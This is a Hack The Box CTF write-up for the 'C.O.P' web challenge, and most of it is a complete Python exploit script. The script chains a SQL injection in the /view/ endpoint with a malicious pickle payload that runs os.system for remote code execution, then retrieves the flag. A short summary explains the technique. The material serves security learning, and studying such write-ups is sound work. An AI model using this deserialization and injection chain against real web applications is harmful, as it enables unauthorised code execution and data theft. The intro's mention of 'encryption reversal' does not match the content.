Post

HackTheBox C.O.P Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the C.O.P Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

import requests
import pickle
import base64
import sys
import os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'

class RCE:
    def __reduce__(self):
        return (os.system, (payload_command,))

def create_malicious_pickle():
    malicious_object = RCE()
    pickled_payload = pickle.dumps(malicious_object)
    encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
    return encoded_payload

def inject_payload(encoded_payload):
    injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
    response = requests.get(injection_url)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print("Server response:", response.text)

def check_flag_file():
    response = requests.get(STATIC_FILE_URL)
    if response.status_code == 200:
        print("[+] Flag file accessed successfully!")
        print("[FLAG CONTENTS]:")
        print(response.text)
    else:
        print("[-] Could not access the flag file. The exploit may not have worked.")

if __name__ == "__main__":
    encoded_payload = create_malicious_pickle()
    print(f"[+] Generated payload: {encoded_payload}")
    inject_payload(encoded_payload)
    check_flag_file()

Summary

C.O.P is an easy-level challenge on Hack The Box that combines insecure deserialization and SQL injection to achieve remote code execution (RCE). A malicious Python object is serialized using pickle and encoded in Base64. The payload is injected via an SQLi vulnerability in the view endpoint, executing a command to copy the flag file to a publicly accessible directory. The flag is then retrieved from the static directory, highlighting the risks of insecure deserialization and improper input sanitization in web applications.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.